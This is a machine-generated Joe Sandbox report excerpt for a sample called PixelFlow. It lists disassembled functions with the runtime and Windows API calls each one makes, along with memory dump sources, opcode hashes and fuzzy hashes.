Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 9aa29d061c3f3bed79f4f70ce9861a3e94c408875f2c2d995d8db725f6f8c0ee
Instruction ID: 8e0f53fd4feb36468e82d7603df2e1ba833fa0f6007282541e4348ae40422812
Opcode Fuzzy Hash: 9aa29d061c3f3bed79f4f70ce9861a3e94c408875f2c2d995d8db725f6f8c0ee
Instruction Fuzzy Hash: 6B324770548201CFD728DF14C590A6BBBE2BF84304F14896DF88A9B3A2D735ED55CB96

Function 0067DF01 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0067DFD4

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

_wcscpy.LIBCMT ref: 0067E063

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 10e7b62e817b7e12728fe0baaa287fb2e2794e06065bdb7a7a06971d179405c5
Instruction ID: 75d786117a84c40ad07e8f464459e9784f20496a58b1922f2dbf01c78fe77d3c
Opcode Fuzzy Hash: 10e7b62e817b7e12728fe0baaa287fb2e2794e06065bdb7a7a06971d179405c5
Instruction Fuzzy Hash: 3E913935A00504DFCB68DF18C5929AAB7E6EF59310B95C49DE80A8F3A2DB31ED05CF85

Function 0066AA7A Relevance: 3.2, APIs: 2, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

SetErrorMode.KERNELBASE(00000001), ref: 0066AAD3
SetErrorMode.KERNELBASE(00000000,00000001,00000000), ref: 0066AC6E

Part of subcall function 00664E59: GetFileAttributesW.KERNELBASE(?,00663A6B), ref: 00664E5A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorMode$AttributesFile_memmove
String ID:
API String ID: 2117146460-0
Opcode ID: f8504a4711bac10e1eb24b2d732cb4c1aa8c6787bf6e9a541b58dcc6d10aae4a
Instruction ID: 135eb6fcdf480ac0ac3a810aea5888ebcf40dc5a8cf79635f81e00468d5c62ad
Opcode Fuzzy Hash: f8504a4711bac10e1eb24b2d732cb4c1aa8c6787bf6e9a541b58dcc6d10aae4a
Instruction Fuzzy Hash: 435166B0508301AFC344EF68D881A6BFBEABF89714F404A1DF99597392DB71E905CB52

Function 00615F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00615FEF

Part of subcall function 006234CE: __lock.LIBCMT ref: 006234D4
Part of subcall function 006234CE: DecodePointer.KERNEL32(00000001,?,00616004,00658675), ref: 006234E0
Part of subcall function 006234CE: EncodePointer.KERNEL32(?,?,00616004,00658675), ref: 006234EB

Part of subcall function 00615F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00615F18
Part of subcall function 00615F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00615F2D

Part of subcall function 00615240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0061526C
Part of subcall function 00615240: IsDebuggerPresent.KERNEL32 ref: 0061527E
Part of subcall function 00615240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006152E6
Part of subcall function 00615240: SetCurrentDirectoryW.KERNEL32(?), ref: 00615366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0061602F

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: e5c71bda14083a3d7b88096be6ca8cdffe1da05928fb36d49f7b2968202258ec
Instruction ID: 28c14cbf474aed21f95e7ff463a48a1d761d9c76840dad4a7ef3f65c6d418b1a
Opcode Fuzzy Hash: e5c71bda14083a3d7b88096be6ca8cdffe1da05928fb36d49f7b2968202258ec
Instruction Fuzzy Hash: D4118C719083119FC310EF69EC49D6ABBEAEF88710F00891EF445872A1DB749644CF9A

Function 0062574D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062577C
__lock_file.LIBCMT ref: 0062579D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: e8586f7bba2f8ec119592bff06c440ad0f43948e118aa8bd8d1d0bbe102bcb33
Instruction ID: 5ca9632d4b81dd2d63f95ca4cf7ed0e5a8603e72bf694d469bec7129a4f5dd2d
Opcode Fuzzy Hash: e8586f7bba2f8ec119592bff06c440ad0f43948e118aa8bd8d1d0bbe102bcb33
Instruction Fuzzy Hash: AE01D431841E29EFCF71AF68AC018DE7B63BF40360F148219F8251B151DB718A11DFA5

Function 006254F6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00628C88: __getptd_noexit.LIBCMT ref: 00628C88

__lock_file.LIBCMT ref: 0062553B

Part of subcall function 00626D6E: __lock.LIBCMT ref: 00626D91

__fclose_nolock.LIBCMT ref: 00625546

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f18dc0195a0cf655de781354ddd94cc12249fc09b29dc0895950d889b08ae11a
Instruction ID: 7f68de667e3cb22ea1b9baf382f5d4d192770160398d7b1ef08b1809d38d54fa
Opcode Fuzzy Hash: f18dc0195a0cf655de781354ddd94cc12249fc09b29dc0895950d889b08ae11a
Instruction Fuzzy Hash: 51F06271901F259ED7606B65BC027AD67E36F40334F15820DB416BB1C1CF784D415F5A

Function 00666E47 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,00666F77,00000000,00000000,00642E79), ref: 00666E6C
InterlockedExchange.KERNEL32(00000034,00000000), ref: 00666E8E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: ea1434e1d48a021bc01df749286119e7ced81abac23559d2653de4c0996fab84
Instruction ID: 71e6a608ad8facc97f7ec2f597a056f203f4f67a7ca0bdfdebebf2731b00f429
Opcode Fuzzy Hash: ea1434e1d48a021bc01df749286119e7ced81abac23559d2653de4c0996fab84
Instruction Fuzzy Hash: CEF034B1100705AFD3209F16D9488A7FBEDFF85710B00882FE48A87A10CBB4A401CF61

Function 00625DB0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00625DE4
__ftell_nolock.LIBCMT ref: 00625DEF

Part of subcall function 00628C88: __getptd_noexit.LIBCMT ref: 00628C88

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 60f727f85dbf1bcf4f6b1bdeda865424c62f808e56cb36f59ddf8a92097e96a4
Instruction ID: 23f5cda23cea819a524201ae30e365473297670e9612e6203235df00d1a44e38
Opcode Fuzzy Hash: 60f727f85dbf1bcf4f6b1bdeda865424c62f808e56cb36f59ddf8a92097e96a4
Instruction Fuzzy Hash: 5CF0A731912E359EDB61BB75AC033AE72A26F00330F114209B021EB1C1CF788E425F9D

Function 00615AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00615AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00615B1F

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 0912f612f656af0eac201678511616b984a895b848e5ee03145437ce516c20f2
Instruction ID: 32d7b075d4b72a08e30fb1ddf1c1006e6433da2da6ea22cfd3f6cf2f24fbc04c
Opcode Fuzzy Hash: 0912f612f656af0eac201678511616b984a895b848e5ee03145437ce516c20f2
Instruction Fuzzy Hash: 79F0A7719043189FD7928F24DC45BE977BD970070CF0001EEBA0996296D7790B88CF55

Function 00623201 Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 00623207

Part of subcall function 006231CD: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0062320C,00620F33,?,00629E1E,000000FF,0000001E,006BB1A8,00000008,00629D82,00620F33,00620F33), ref: 006231DC
Part of subcall function 006231CD: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 006231EE

ExitProcess.KERNEL32 ref: 00623210

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: ff8043a4b2594ac8e1b97f07705843d402ca17f345a4f937b4e1e10a4a4979d9
Instruction ID: e3c220d0afc18320480295762fe6ca9cd05b624ba80227cad5c0031bac42925b
Opcode Fuzzy Hash: ff8043a4b2594ac8e1b97f07705843d402ca17f345a4f937b4e1e10a4a4979d9
Instruction Fuzzy Hash: 38B09231000228BFDB412F11EC0A8483F2AEB00690B004126F81408172DB72AAA19EC5

Function 0067C11D Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: a5f94635c01501af016e1a32014e28c57ce550cfdf900ef13ac8cb88af440a33
Instruction ID: 721590a69b99a70ef4ea8628a895cf703ccb5074e215afccba9edc4fbadd1683
Opcode Fuzzy Hash: a5f94635c01501af016e1a32014e28c57ce550cfdf900ef13ac8cb88af440a33
Instruction Fuzzy Hash: DEB12A74A00109DFCB14EF94D8519EEB7B6FF48320F54811EF91AAB391EB31A946CB94

Function 0061343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0061351A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 064364b6494a19326d48a20089add98b293fad997bc1e3d50ebaf2e7f18d6c3a
Instruction ID: c21a9829bd6189af9f007c670654a18a8636c9f0eb9953459f7bb4aa58f971ed
Opcode Fuzzy Hash: 064364b6494a19326d48a20089add98b293fad997bc1e3d50ebaf2e7f18d6c3a
Instruction Fuzzy Hash: 5631C175204A22DFD724DF18D180AA1F7E2FF08310B58C56DE88B8B751D730E882CB94

Function 0063E20F Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0063E21A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 36fb58c5dfe907066bb77a07de2b7416c605c39e5ae819d0d96a8fc84892cec0
Instruction ID: c4fe7de514c675752aa16a25d4dbc9bee308845fb62f6e5931700040ef8756e3
Opcode Fuzzy Hash: 36fb58c5dfe907066bb77a07de2b7416c605c39e5ae819d0d96a8fc84892cec0
Instruction Fuzzy Hash: 04410874544351CFEB28DF14C444B5ABBE2BF45308F0988ACF8894B3A2C372E855CB96

Function 006149C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00614B29: FreeLibrary.KERNEL32(00000000,?), ref: 00614B63

Part of subcall function 006253AB: __wfsopen.LIBCMT ref: 006253B6

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,006127AF,?,00000001), ref: 006149F4

Part of subcall function 00614ADE: FreeLibrary.KERNEL32(00000000), ref: 00614B18

Part of subcall function 006148B0: _memmove.LIBCMT ref: 006148FA

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 82c243288aa2a876b207b1fe5ab4366844e54b23e7d243374d29a0251e1de1ef
Instruction ID: 3f53c12618aa223b016d16070cae38229b9f5da2e2efb162f9909a4f43754dc5
Opcode Fuzzy Hash: 82c243288aa2a876b207b1fe5ab4366844e54b23e7d243374d29a0251e1de1ef
Instruction Fuzzy Hash: 1F11E332650209ABDF50FB70CC12FEE77AB9F40711F15842DF942A7185EF709A45ABA8

Function 0063E2F2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0063E2FE

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e45ebd74cf0fb511ece566a40fce40ee2c2960160abf5d1912f71e8b070e85b8
Instruction ID: 8374722db2b49c1820ae02c8ded084a12b1116e322d4d56178eb3cd896aede33
Opcode Fuzzy Hash: e45ebd74cf0fb511ece566a40fce40ee2c2960160abf5d1912f71e8b070e85b8
Instruction Fuzzy Hash: F52102B4548311DFDB68DF54C444A5BBBE2BF88304F04496CF88A473A2C331E859CB92

Function 00611A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00611A77

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 601a03ef88ea8750e6b82287a8e1a611e90469ee9d82ffd9b8e3a13cce1b79d2
Instruction ID: 4290dd5832d2e047e8d93774d96df4d73ae63d1779a52d350a184b41a8149b4d
Opcode Fuzzy Hash: 601a03ef88ea8750e6b82287a8e1a611e90469ee9d82ffd9b8e3a13cce1b79d2
Instruction Fuzzy Hash: 22014E732417056ED3605F38EC02BA7BF95DF44390F14852DFA1ACE1D1DA31E4808B54

Function 0067473F Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0067477C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: f7996850b4de76a8f0520ddc0dd16f18efe71909437becfbea2678296bbe0a6a
Instruction ID: d8cb850b41077b53f6c859f621fd51bad75e56ce13d970f10c2f1b456ffc86d8
Opcode Fuzzy Hash: f7996850b4de76a8f0520ddc0dd16f18efe71909437becfbea2678296bbe0a6a
Instruction Fuzzy Hash: 38F03171608104AF9B54EB65D84AC9F77B9EF45720B00415AF8049B251DF70BD41CBA5

Function 00614A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00614AA4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
Instruction ID: 9defa2685d398f7440acf0f9947f3b5058663a19891e5d5e01dc6f41f4ddf1a7
Opcode Fuzzy Hash: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
Instruction Fuzzy Hash: F5F08CB6400208BFDF108F84DC00CEB7B7AEF85320F10409CF9045A210D232E961CBA0

Function 00614A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,006127AF,?,00000001), ref: 00614A63

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9887c409d0a5aca5e27a74e1bdc48f72be3c58e02ed3f10ad167e0604bdbbe81
Instruction ID: ab3080c71c720f01958f24160968e7e4c983c1fb6a775d37f9ce6dab4278aa49
Opcode Fuzzy Hash: 9887c409d0a5aca5e27a74e1bdc48f72be3c58e02ed3f10ad167e0604bdbbe81
Instruction Fuzzy Hash: 44F01571145711CFCB349F68E494896BBF6AF1436632D892EE5E783614CB319884DF44

Function 00614AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00614AD0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
